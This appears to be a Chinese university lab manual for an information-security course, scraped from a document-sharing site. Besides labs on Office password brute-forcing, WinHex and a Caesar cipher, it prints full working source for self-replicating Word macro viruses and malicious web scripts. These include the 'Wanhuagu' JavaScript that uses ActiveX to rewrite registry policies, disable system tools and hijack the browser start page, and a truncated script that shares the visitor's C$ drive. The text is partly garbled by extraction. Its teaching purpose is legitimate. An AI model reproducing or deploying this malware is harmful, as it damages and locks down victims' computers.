版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
信息安全與應(yīng)用試驗指導(dǎo)書任課教師:目 錄1.office口令破解工具aoxppr的使用2.Winhex編輯軟件的使用3.用C語言編程實現(xiàn)凱撒密碼4.嗅探器Ethereal的使用5.Word宏病毒試驗6.Web惡意代碼試驗7.端口掃描X-scan的使用8.加密軟件pgp的使用試驗一officeaoxpprwordword文檔。試驗要求:某個同學(xué)設(shè)置word4,5,6,承受字母數(shù)字混合。試驗步驟:aoxpprsetup,一步步安裝完成;運行Aoxpp,點擊“幫助key.txtO;破解類型選項,選暴力破解,字母數(shù)字混合,密碼長度最大選6;某人制作一個word文檔,對其進(jìn)展加密;另一人對其進(jìn)展解密,在Aoxppr中輸入待解密文件的文件名,點擊開頭解密。假設(shè)該文檔沒有密碼,軟件馬上就會報告此文檔不用解密,4位密碼很快就可破譯,6位的密碼破解時間要長一點,運行過程中,隨時可以終止運行。系統(tǒng)破解后,會顯示出Office文檔的密碼。破解過程中可以使用掩碼,如密碼有8位,以x開頭,以99完畢,可以設(shè)置掩碼為“x99“用該密碼去解密OFFICE文檔。winhex編輯軟件的使用試驗?zāi)康模?。利用Winhex查看磁盤文件的十六進(jìn)制編碼;2。利用Winhex實現(xiàn)文件的簡潔數(shù)學(xué)3.加密變換;利用Winhex恢復(fù)被誤刪除的文件。11組,獨立完成試驗步驟:DX-ways文件夾,再在這個文件夾中建立case、images、temp等3個文件夾,分別用于保存案例文件、鏡像文件和臨時文件。運行winhex,進(jìn)入系統(tǒng)。依據(jù)提示,必需選擇“Computerforensicsinterface〔計算機取證完成后進(jìn)入軟件操作界面。DX-waysx-ways.txtwinhex軟件。在winhex界面中,單擊fil” “open。將第,2D1A保持翻開的x-ways.txt文件,單擊Edi “modifydat,選擇xo”并輸75,即完成了該文件的加密變換。winhex中關(guān)閉x-ways.txt文件,進(jìn)入“資源治理器”將該文件刪除并清空回收站,此時windows系統(tǒng)無法恢復(fù)該文件。下面利用winhex來恢復(fù)該文件。單擊“casedata”窗口中的“file” “createnewcase”建立的分析案例,然后單擊“file”----“addmedium”添加的存儲介質(zhì),此處為D盤。添加后x-ways”文件夾,可覺察被刪除的文件已在其中。右擊該文件,選擇“Recover/cop試驗三.用C一、試驗?zāi)康模和ㄟ^編程實現(xiàn)替代密碼算法和置換密碼算法,加深對古典密碼體制的了解,為深入學(xué)習(xí)密碼學(xué)奠定根底。二、試驗內(nèi)容:試驗參考步驟:建工程。工程類型選“win32consoleapplication選取“FileVieSourceFiles開頭編程。ws2_32.lib參加。編譯生成可執(zhí)行文件。 和密文。myCrySubstitude.cpp內(nèi)容如下:#include“myCrySubstitude.h“intEncrypt(unsignedchar*str,unsignedchar*code){if(str==NULL||code==NULL)returnCRYPT_ERROR;intstr_length=0;inti=0;while(str[i]!=”\0”){str_length++;i++;}if(str_length>1024){printf(“1024位“);returnCRYPT_ERROR;}elseif(code[1]!=”\0”){printf(“密鑰輸入字符不是一位“);returnCRYPT_ERROR;}if(ToLowerCase(str)!=0){printf(“明文字符串轉(zhuǎn)化小寫字符出錯“);returnCRYPT_ERROR;}if(ToLowerCase(code)!=0){printf(“密鑰字符串轉(zhuǎn)化小寫字符出錯“);returnCRYPT_ERROR;}intkey=code[0]-97;for(i=0;i<str_length;i++){str[i]+=key;if(str[i]>122)str[i]-=26;}returnCRYPT_OK;}intDecrypt(unsignedchar*str,unsignedchar*code){if(str==NULL||code==NULL)returnDECRYPT_ERROR;intstr_length=0;inti=0;while(str[i]!=”\0”){str_length++;i++;}if(str_length>1024){printf(“1024位“);returnCRYPT_ERROR;}elseif(code[1]!=”\0”){printf(“密鑰輸入字符不是一位“);returnCRYPT_ERROR;}if(ToLowerCase(str)!=0){printf(“明文字符串轉(zhuǎn)化小寫字符出錯“);returnCRYPT_ERROR;}if(ToLowerCase(code)!=0){printf(“密鑰字符串轉(zhuǎn)化小寫字符出錯“);returnCRYPT_ERROR;}intkey=code[0]-97;for(i=0;i<str_length;i++){str[i]-=key;if(str[i]<97)str[i]+=26;}returnCRYPT_OK;}intToLowerCase(unsignedchar*str){if(str==NULL)return0;inti=0;for(i=0;str[i]!=”\0”;i++){if(str[i]>64&&str[i]<91)str[i]+=32;elseif(str[i]>96&&str[i]<123);else{printf(“輸入了非英文字符“);return1;}}return0;}試驗四.嗅探器Ethereal參看教材P300頁。試驗五.Word宏病毒試驗試驗?zāi)康模?. 演示宏的編寫;2、說明宏的原理及其安全漏洞和缺陷;3、理解宏病毒的作用機制試驗平臺:Windows系列操作系統(tǒng),Word2003應(yīng)用程序試驗步驟:1.軟件設(shè)置:關(guān)閉殺毒軟件;翻開Word2003,在工具宏安全性中,將安全級別設(shè)置visualbasic工程的訪問。word文檔,否則去除比較麻煩〔對每個翻開過的文檔都要去除。2.自我復(fù)制功能演示。翻開一個word文檔,然后按Alt+F11調(diào)用宏編寫窗口〔工具宏VisualBasic宏編輯器〕,在左側(cè)的project—>MicrosoftWord對象ThisDocument中輸入以上代碼〔參見源代碼macro_1.tx,保存,此時當(dāng)前word文檔就含有宏病毒,只要下次翻開這個word文檔就會執(zhí)行以上代碼,并將自身復(fù)制到Normal.dot〔word文檔的公共模板〕和當(dāng)前文檔的ThisDocument 中,同時改變函數(shù)名〔模板中為Document_Close,當(dāng)前文檔為Document_Ope,此時全部的word文檔翻開和關(guān)閉時,都將運行以上的病毒代碼可以參加適當(dāng)?shù)膼阂獯a,影響word的正常使用,本例中只是簡潔的跳出一個提示框。代碼如下:”Micro-VirusSubDocument_OpenOnErrorResumeNextApplication.DisplayStatusBar=FalseOptions.SaveNormalPrompt=FalseSetourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>“”Micro-Virus“Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine2,“SubDocument_Close“IfThisDocument=NormalTemplateThen.ReplaceLine2,“SubDocument_Open“ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithMsgBox“MicroVirusbyContentSecurityLab“EndSub代碼解釋以上代碼的根本執(zhí)行流程如下:進(jìn)展必要的自我保護(hù)Application.DisplayStatusBar=FalseOptions.SaveNormalPrompt=False超群的病毒編寫者其自我保護(hù)將做得格外好,可以使word的一些工具欄失效,例如將工具菜單中的宏選項屏蔽,也可以修改注冊表到達(dá)很好的隱蔽效果。用戶提示。得到當(dāng)前文檔的代碼對象和公用模板的代碼對象Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIf檢查模板是否已經(jīng)感染病毒,假設(shè)沒有,則復(fù)制宏病毒代碼到模板,并且修改函數(shù)名。WithHostIf.Lines(1.1)<>“”Micro-Virus“Then.DeleteLines1,.CountOfLines.InsertLines1,Ourcode.ReplaceLine2,“SubDocument_Close“IfThisDocument=nomaltemplateThen.ReplaceLine2,“SubDocument_Open“ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWith執(zhí)行惡意代碼MsgBox“MicroVirusbyContentSecurityLab“3.具有肯定破壞性的宏我們可以對上例中的惡意代碼稍加修改〔灣一號”的惡意代碼局部為根底,為使其在word2003版本中運行,且降低破壞性,對源代碼作適當(dāng)修改,參見源代碼macro_2.tx。完整代碼如下:”moonlightDimnm(4)SubDocument_Open”DisableInput1Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>“”moonlight“Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine3,“SubDocument_Close“IfThisDocument=NormalTemplateThen.ReplaceLine3,“SubDocument_Open“ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithCount=0IfDay(Now)=1Thentry:OnErrorGoTotrytest=-1con=1tog$=““i=0Whiletest=-1Fori=0To4nm(i)=Int(Rnd*10)con=con*nm(i)Ifi=4Thentog$=tog$+Str$(nm(4))+“=?“GoTobegEndIftog$=tog$+Str$(nm(i))+“*“Nextibeg:Beepans$=InputBox$(“今日是“+Date$+“,跟你玩一個心算玩?!?Chr$(13)+“假設(shè)你答錯,只好承受震撼教育 “+Chr$(13)+tog$,“臺灣NO.1MacroVirus“)IfRTrim$(LTrim$(ans$))=LTrim$(Str$(con))ThenDocuments.AddSelection.Paragraphs.Alignment=wdAlignParagraphCenterBeepWithSelection.Font.Name=“細(xì)明體“.Size=16.Bold=1.Underline=1EndWithSelection.InsertAfterText:=“何謂宏病毒“Selection.InsertParagraphAfterBeepSelection.InsertAfterText:=“答案:“Selection.Font.Italic=1Selection.InsertAfterText:=“我就是 Selection.InsertParagraphAfterSelection.InsertParagraphAfterSelection.Font.Italic=0BeepSelection.InsertAfterText:=“如何預(yù)防宏病毒“Selection.InsertParagraphAfterBeepSelection.InsertAfterText:=“答案:“Selection.Font.Italic=1Selection.InsertAfterText:=“不要看我 GoTooutElseCount=Count+1Forj=1To20BeepDocuments.AddNextjSelection.Paragraphs.Alignment=wdAlignParagraphCenterSelection.InsertAfterText:=“宏病毒“IfCount=2ThenGoTooutGoTotryEndIfWendEndIfout:EndSubwordword模板,然后檢查日期,看是否是1日〔即在每月的1日會發(fā)作10的數(shù)相乘,假設(shè)作者的計算正確,那么就會建一個文檔,跳出如下字幕:何謂宏病毒......如何預(yù)防宏病毒......假設(shè)計算錯誤,建20word文檔,然后再一次進(jìn)展心算玩耍,3次,然后跳出程序。關(guān)閉文檔的時候也會執(zhí)行同樣的詢問。4.去除宏病毒對每一個受感染的word文檔進(jìn)展如下操作:翻開受感染的word文檔,進(jìn)入宏編輯環(huán)境Alt+F1,翻開NormaMicrosoftWord對象ThisDocument,去除其中的病毒代碼〔只要刪除全部內(nèi)容即可。然后翻開ProjectMicrosoftWordThisDocument,去除其中的病毒代碼。毒后,假設(shè)重翻開其他已感染文件,模板將再次被感染,因此為了保證病毒被去除查看每一個受感染文檔的模板,假設(shè)存在病毒代碼,都進(jìn)展一次去除。試驗六.Web有,也要以犧牲很多功能作為代價。所謂惡意網(wǎng)頁主要是利用軟件或系統(tǒng)操作平臺等的安全漏洞,通過執(zhí)行嵌入在網(wǎng)頁HTML超文本標(biāo)記語言內(nèi)的JavaApplet小應(yīng)用程序,JavaScript腳本語言程序,ActiveX控件部件等可自動執(zhí)行的代碼程序,強行修改用戶操作系統(tǒng)的注冊表設(shè)置及系統(tǒng)有用配置程法惡意程序。該類程序的網(wǎng)頁,就會在不知不覺的狀況下立馬中招,給系統(tǒng)帶來不同程度的破壞。試驗?zāi)康?把握網(wǎng)頁惡意代碼根本原理。試驗平臺:WindowsXP操作系統(tǒng),IE〔InternetExplorer〕掃瞄器試驗步驟:建Web頁面,輸入程序源碼。程序源碼如下:<html><bodyonload=“WindowBomb“><SCRIPTLANGUAGE=“javascript“>functionWindowBomb{while(true){“://163/“window.open(“://163“)}}</script></body></html>IE翻開該文件,觀看試驗結(jié)果,可以看到IE163網(wǎng)頁。假設(shè)IE阻擋了顯示內(nèi)容,右鍵點擊消滅的提示信息,選擇“允許阻擋的內(nèi)容看到試驗現(xiàn)象。建Web頁面,編輯程序源碼。程序源碼如下:<html><body><script>varcolor=newArraycolor[0]=“black“color[1]=“white“x=0;while(true){document.bgColor=color[x++];document.bgColor=color[x--];}</script></body></html>IE翻開該文件,IE顯示的地方消滅黑白顏色不斷的閃動。假設(shè)IE阻擋了顯示內(nèi)容,右鍵點擊消滅的提示信息,選擇“允許阻擋的內(nèi)容看到試驗現(xiàn)象。很多人都知道萬花谷病毒的厲害,由于其危害之大,很多網(wǎng)站都公布了其源代碼。即使不會編程,也能直接拷貝來用。以下就是這個病毒的代碼:document.write(““);functionAddFavLnk(loc,DispName,SiteURL)·201·{varShor=Shl.CreateShortcut(loc+“\\“+DispName+“.URL“);Shor.TargetPath=SiteURL;Shor.Save;}functionf{try{ActiveXinitializationa1=document.applets[0];a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}“);a1.createInstance;Shl=a1.GetObject;a1.setCLSID(“{0D43FE01-F093-11CF-8940-00A0C9054228}“);a1.createInstance;FSO=a1.GetObject;a1.setCLSID(“{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}“);a1.createInstance;Net=a1.GetObject;Try{if(documents.cookies.indexOf(“Chg“)==-1){//Shl.RegWrite(“HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Start“,“://“://on888.home.chinaren/“on888.home.chinaren/“);varexpdate=newDate((newDate).getTime+(1));documents.cookies=“Chg=general;expires=“+expdate.toGMTString+“;path=/;Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun“,01,“REG_BINARY“);//消退“運行”按鈕Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose“,01,“REG_BINARY“);//消退“關(guān)閉”按鈕Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff“,01,“REG_BINARY“);//消退“注銷”按鈕Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives“,“63000000“,“REG_DWORD“);//隱蔽盤符Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegis-tryTools“,“00000001“,“REG_DWORD“);//制止注冊表Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disablecmd“,“00000001“,“REG_DWORD“);//DOS程序不能用Shl.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealM-ode“,“00000001“,“REG_DWORD“);//DOS方式Shl.RegWrite(“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCapt-ion“,“歡送來到萬花谷!你中了※萬花奇毒※.請與OICQ:4040465聯(lián)系!“);//設(shè)置開機提示標(biāo)題·202·Shl.RegWrite(“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText“,“.請與OICQ:4040465聯(lián)系!“);//設(shè)置開機提示內(nèi)容Shl.RegWrite(“HKLM\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle“,“歡送來到萬花谷!你中了※萬花奇毒※.請與OICQ:4040465聯(lián)系!“);//IE標(biāo)題Shl.RegWrite(“HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle“,“歡送來到萬花谷!你中了※萬花奇毒※.請與OICQ:4040465聯(lián)系!“);//IE標(biāo)題varexpdate=newDate((newDate).getTime+(1));documents.cookies=“Chg=general;expires=“+expdate.toGMTString+“;path=/;}}catch{}}catch{}}functioninit{setTimeout(“f“,1000);}init;將以上這段JAVA腳本代碼參加到你自己網(wǎng)頁的HTML源代碼中,就可以對掃瞄者JAVA腳本。萬花谷病毒,用一些專殺工具來查殺,沒有想到你還有另外隱蔽的一手。設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”為01〔取消開頭菜單上的“運行”項〕設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”為01〔取消開頭菜單上的“關(guān)閉”項〕設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”為01〔取消開頭菜單上的“注銷”項〕設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”為63000000〔隱蔽盤符,你也可以將此項改00000004只隱蔽C盤〕設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”為00000001〔使注冊表工具不行用〕設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disablecmd”為00000000〔原DOS程序不行用〕設(shè) 置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode”為00000000〔不能進(jìn)入DOS方式〕設(shè)置“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”為“歡送來到萬花谷!你中了※萬花奇毒※.請與OICQ:4040465〔請與OICQ:4040465〕●設(shè)置“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText請與OICQ:4040465聯(lián)系!”〔設(shè)置登錄窗口的內(nèi)容提示為“歡送來到萬花谷!你中了※萬花奇毒※.請與OICQ:4040465〕設(shè)置“HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\WindowTitl.請與OICQ:4040465聯(lián)系〔設(shè)置IE窗口.請與OICQ:4040465聯(lián)系〕●修改“HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Start”為““://on888.home.chinaren/“://on888.home.chinaren/”〔設(shè)置IE的首頁為“://on888.home.chinaren/“://on888.home.chinaren〕某天你自己無意中點擊了這種網(wǎng)頁怎么辦呢?可以承受以下的方法來解決。DOSC:\Windows\Sysbckup名目〔此名目是隱蔽屬性,用Attrib命令去掉其隱蔽屬性〕找到rb004.cabZIP解壓rb004.cab得到四個文件,把這四個文件復(fù)制到C:\Windows下掩蓋原文件,用安全模式啟動電腦,運行Msconfig,然后在“啟動”的標(biāo)簽中找到“HA.hta”把多項選擇框前面的溝去掉〔可以去掉前面的勾,再重啟動計算機就OK了?、谠贒OSscanreg/restore注冊表,然后再刪除啟動組中的HA.hta即可。注冊表。應(yīng)付“萬花谷”之類的腳本病毒只要實行切實可行的防范措施,就能將它們拒之門外,由于這些病毒都是通過在網(wǎng)頁中使用惡意腳本程序來運行的可以到達(dá)防范于未然的目的。InterneInternet屬性”對話框,單擊“安全”頁面,然后按“自定義級別”按鈕進(jìn)入“安全設(shè)置”對話框,將“腳本”選項中的Java和“活動腳本”都設(shè)為“禁用正常網(wǎng)頁中全部通過腳本實現(xiàn)的網(wǎng)頁特別效果也全部被禁用了。自行修改。本段代碼僅供爭論、學(xué)習(xí)使用,不得將本段代碼用于非法場合,否則后果自負(fù)。通過在網(wǎng)頁HTML源代碼參加JavaScript腳本,同樣可以實現(xiàn)將掃瞄者的硬盤設(shè)置為共享的目的。scriptlanguage=JavaScriptdocument.write(““);functionf{a1=document.applets[0];a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}“);a1.createInstance;Shl=a1.GetObject;Shl.RegWrite(“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags“,302,“REG_DWORD“);Shl.RegWrite(“HKLM\\Software\
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 二零二五年度門衛(wèi)服務(wù)與消防聯(lián)動合同4篇
- 2025年度鮮奶產(chǎn)品溯源與安全監(jiān)管合同3篇
- 二零二五年度體育賽事贊助合作協(xié)議模板4篇
- 2025年度速錄設(shè)備租賃與技術(shù)研發(fā)合作合同3篇
- 2024年中考英語應(yīng)用文寫作萬能模板
- 開鎖公司與業(yè)主委員會協(xié)議書(2篇)
- 工程承包工傷協(xié)議書(2篇)
- 瑞麗防塵施工方案
- 二零二五版門禁系統(tǒng)用戶身份認(rèn)證與隱私保護(hù)協(xié)議4篇
- 建筑安全文明施工方案
- 課題申報書:GenAI賦能新質(zhì)人才培養(yǎng)的生成式學(xué)習(xí)設(shè)計研究
- 駱駝祥子-(一)-劇本
- 全國醫(yī)院數(shù)量統(tǒng)計
- 經(jīng)濟學(xué)的思維方式(第13版)
- 提高保險公司客戶投訴處理能力的整改措施
- 電工(中級工)理論知識練習(xí)題(附參考答案)
- 工業(yè)設(shè)計概論試題
- 2024-2030年中國商務(wù)服務(wù)行業(yè)市場現(xiàn)狀調(diào)查及投資前景研判報告
- 高一英語必修一試卷(含答案)(適合測試)
- 中國的世界遺產(chǎn)智慧樹知到期末考試答案2024年
- 中國綠色食品市場調(diào)查與分析報告
評論
0/150
提交評論